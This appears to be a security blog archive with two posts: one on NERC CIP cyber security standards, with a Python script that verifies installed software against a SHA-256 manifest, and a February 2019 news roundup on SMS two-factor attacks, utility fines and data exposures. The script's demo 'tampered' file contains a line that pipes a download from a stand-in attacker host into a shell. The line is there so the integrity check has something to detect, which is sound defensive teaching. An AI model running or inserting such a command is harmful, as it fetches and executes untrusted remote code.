Tag Archives: NERC

Regulators Update Cyber Security Regs for Electric Utilities

Very few of my readers run electric utilities – those are the ones that these regulations apply to directly.

Then there are folks who are suppliers to utilities.  And suppliers to those suppliers.  The new regs require that utilities have a decent vendor cyber risk management program.  That increases the pool of interested parties a bit.

Then there are those folks who use electricity and would appreciate it if their lights stay on.  Except for those who run their own wind or solar farms, that is the rest of us.

And of course, last, but not least, there are other regulators who are going to watch and say “hey, that sounds like a good regulation;  I think I will adopt it for people who do business in my industry or my state”.

So what is in the new regs?

The regulator is NERC – the North American Electric Reliability Corporation.  NERC is a not-for-profit corporation that FERC has designated as the Electric Reliability Organization for the bulk power system, so its standards are mandatory and enforceable, not advisory.  The cyber security rules are the Critical Infrastructure Protection (CIP) standards.

Note that I am only going to touch on the tip of the regulatory iceberg here, but I will give you a link to all of the CIP regs at the end in case you want to steal some of their ideas.

CIP-005-6 Electronic Security Perimeter

Note all the leading zeros in the standard number.  Room for up to a thousand standards.  The number after the dash is the version, so CIP-005 is already on its sixth revision.  That’s pretty scary.

This standard adds detailed requirements for firewalls, DMZs and network segmentation around the control systems that matter most.  Probably a good idea for everyone.   It also requires that you be able to determine how many active vendor remote access sessions you have (as opposed to employee sessions) and that you have a way to disable them.  Again, probably a good idea for everyone.

CIP-010-3 Configuration Change Management and Vulnerability Assessments

Again, change control and vulnerability assessments should be things that everyone is doing anyway.  One thing this adds is a requirement that, before you install software, you verify the identity of the source it came from and the integrity of what you obtained from that source.  Can you do that?  Do you even know what software is in your environment and where it came from?  Think of this as a software bill of materials (SBOM) on steroids.  Once you do know what software you have, that helps with vulnerability assessments.  But how do you “verify” each piece of software?  The suggested approach is cryptographic checksums or signatures for everything.  Ask Equifax, whose 2017 breach traced back to an Apache Struts instance they did not realize was still unpatched.  It is not as easy as it sounds.
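To make the integrity half of that requirement concrete, here is an added example (my code, not NERC’s and not from any utility) of a check that compares every file under a software install directory with a vendor hash manifest in `sha256sum` format.  The file names, the manifest contents and the “tampered” payload are constructed for the demo.  It reports four outcomes: files that match, files that were altered, files the manifest lists but that are absent, and files on disk that no manifest entry covers, which is the “do you even know what software you have” problem.  One caveat the code cannot fix for you: the manifest has to arrive over a channel you trust separately from the download itself, otherwise whoever swapped the binary also swapped the checksum.

```python
"""Verify installed software artifacts against a vendor SHA-256 manifest.

Added example, not code from the original post or from NERC.  Manifest lines
follow `sha256sum` output: '<64 hex chars>  <relative path>' (binary mode
marks the name with a leading '*').  All sample files and hashes below are
constructed for the demo.
"""
import hashlib
import hmac
import os
import tempfile
from typing import Dict


def sha256_file(path: str, chunk_size: int = 1 << 16) -> str:
    """Stream a file through SHA-256 so large firmware images do not need to fit in RAM."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def parse_manifest(text: str) -> Dict[str, str]:
    """Parse sha256sum-style lines into {relative path: lowercase hex digest}."""
    entries: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(maxsplit=1)
        if len(parts) != 2 or len(parts[0]) != 64:
            raise ValueError(f"malformed manifest line: {line!r}")
        digest, name = parts[0].lower(), parts[1].lstrip("*")
        entries[name] = digest
    return entries


def verify_tree(root: str, manifest: Dict[str, str]) -> Dict[str, str]:
    """Return {relative path: 'ok' | 'mismatch' | 'missing' | 'unlisted'}."""
    on_disk: Dict[str, str] = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            full = os.path.join(dirpath, fn)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            on_disk[rel] = full

    results: Dict[str, str] = {}
    for rel, expected in manifest.items():
        if rel not in on_disk:
            results[rel] = "missing"
        elif hmac.compare_digest(sha256_file(on_disk[rel]), expected):
            results[rel] = "ok"
        else:
            results[rel] = "mismatch"
    for rel in on_disk:
        if rel not in manifest:
            results[rel] = "unlisted"   # present on disk, vendor never shipped it
    return results


def demo() -> Dict[str, str]:
    """Constructed sample package: one good file, one tampered file,
    one listed file that is absent, and one stray file nobody shipped."""
    good = b"#!/bin/sh\necho relay firmware loader\n"
    tampered = b"#!/bin/sh\ncurl http://attacker.invalid/x | sh\n"   # constructed, not a real payload
    files = {
        "bin/loader.sh": good,
        "lib/helper.so": tampered,      # manifest expects the original helper
        "etc/rogue.cfg": b"x",          # not in the manifest at all
    }
    manifest_text = "\n".join([
        f"{hashlib.sha256(good).hexdigest()}  bin/loader.sh",
        f"{hashlib.sha256(b'original helper').hexdigest()}  lib/helper.so",
        f"{hashlib.sha256(b'release notes').hexdigest()}  doc/NOTES.txt",
    ])
    with tempfile.TemporaryDirectory() as root:
        for rel, data in files.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as f:
                f.write(data)
        return verify_tree(root, parse_manifest(manifest_text))


if __name__ == "__main__":
    for path, status in sorted(demo().items()):
        print(f"{status:9s} {path}")
```

Running it prints `missing doc/NOTES.txt`, `ok bin/loader.sh`, `mismatch lib/helper.so` and `unlisted etc/rogue.cfg`.  Anything other than `ok` across the board should block the change from going ahead; the `unlisted` case is the one most inventories never look for.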

CIP-013-1 Supply Chain Risk Management

This may well be the most complex part.  Most companies have a lot of suppliers.  Big companies have thousands.  Small companies have hundreds.  The number of vendors is amazing.  The standard requires a documented supply chain cyber security risk management plan, and remember, those vendors have vendors.  And the whole thing has to be approved by a senior manager whose head is on the proverbial chopping block.

Check these CIPs out and see if any of them make sense to you.  Then adopt them.

All of NERC’s CIP standards can be found here.

And, just in case you are thinking this is just some private regulator with no clout: last year they fined an unnamed utility (which everyone knows is Duke Energy) $10 million for violating the rules.


Security News Bites for the Week Ending February 8, 2019

Text Messaging for Two Factor Authentication is Under Attack

We have talked on occasion about a basically theoretical attack against text messages as the second factor for authentication.  It is likely that the feds know more than they are telling us about that, since the National Institute of Standards and Technology (NIST SP 800-63B) now classes SMS one-time codes as a “restricted” authenticator and discourages them for new systems.

Now we are seeing a large, in the wild, attack against real two factor authentication, specifically in banking.

Britain’s National Cyber Security Centre (NCSC), part of GCHQ, their signals intelligence agency, admitted that it is aware this is being exploited.   As are the telephone carriers.

The attack still requires a sophisticated attacker, because it depends on getting access to the SS7 signalling network (through a compromised or complicit carrier) and sending forged routing messages so that text messages for the targeted phone number are delivered to the attacker instead.  Hard, but far from impossible.

Still, in light of this being a real-world-empty-your-bank-account kind of attack, financial institutions should begin the transition away from text messaging to two factor apps (like Google Authenticator and others) to protect client accounts sooner rather than later.  Source: Motherboard.

 

Unnamed Energy Company (Duke) Fined $10 Million for Security Lapses

An unnamed energy company received the largest fine of its type ever at $10 million for security lapses,  including letting unauthorized people into secure areas and allowing uncleared computers to connect to secure networks, sometimes for months at a time.

The fine covers 130 violations.

The reason the company is unnamed is that it is likely the list of identified vulnerabilities is not complete and the identified holes are not all closed.

The WSJ reports that the company is Duke Energy.  So much for keeping their name out of the media.

This certainly could explain why many people say that the bad guys already “own” our energy utilities.  Source: Biz Journals.

 

Another Cryptocurrency Debacle

I keep saying that attacks on Cryptocurrency will not be on the math (encryption) but rather on the systems and software.

This week QuadrigaCX filed for the Canadian version of bankruptcy protection saying that they stored the vast majority of their assets in offline storage wallets and the only person who had the key was their CEO, who died suddenly.

They claim to have lost access to $145 million in a variety of cryptocurrencies and do not have the money to repay their customers.

Some users and researchers are skeptical of this story (really, no backup of the keys to over $140 million?).  Seems hard to swallow.

The researchers, after looking at the blockchain, say that they can find no evidence that QuadrigaCX holds anything close to $100 million in Bitcoin, and suggest the founder’s death may have been faked as an exit scam.

Assuming this all plays out the way it seems, customers are going to be waving bye-bye to $145 million of their cold, hard crypto coins.  Source: The Hacker News.

 

Apple to Release iOS 12.1.4 to Fix FaceTime Bug This Week

In what has got to be the worst iPhone bug in a long time – one that let a caller hear audio from the person they were calling before the call was answered, until Apple deactivated Group FaceTime worldwide – Apple seems to be slow to respond.  Uncharacteristically.  Very.  Slow.

My guess is that the problem was technically hard to fix even though it was technically easy to exploit.  In any case, iOS 12.1.4 should be out this week and it is supposed to fix the security hole. Source: ZDNet .

 

Online Casino Leaves Data on 100+ Million Bets Unprotected

Security researcher Justin Paine found a public Elasticsearch database sitting unprotected online.

Contents include personal information such as name, address, birthdate, email and phone, as well as bet information such as winnings amounts.   There appear to be multiple companies involved, with some common ownership, based in Cyprus and operating under a Curaçao gaming license.  When ZDNet reached out to them, they did not immediately reply, but the server went dark.

The company, Mountberg Limited, did reach out later thanking Justin for letting them know, but made no statement about their clients’ data.  Source: ZDNet.

 

Germany Tells Facebook Not to Combine User Data Without Explicit Permission 

The Europeans are not happy with U.S. big tech.

In a ruling NOT related to GDPR, Germany’s Federal Cartel Office (the Bundeskartellamt) says that Facebook cannot combine Instagram, WhatsApp and third party data into a user’s Facebook profile without explicit user permission, and that having the user check a box that says something like “we are going to do some stuff; you should read our 19 page description” is not adequate.

The regulator says that by doing this Facebook is abusing its dominant market position.  Facebook, not surprisingly, disagrees and says that the regulator is out of line.  Stay tuned.  If this ruling stands, it could have a big impact on all companies that aggregate data from third parties without fully telling their clients.  Source: BBC.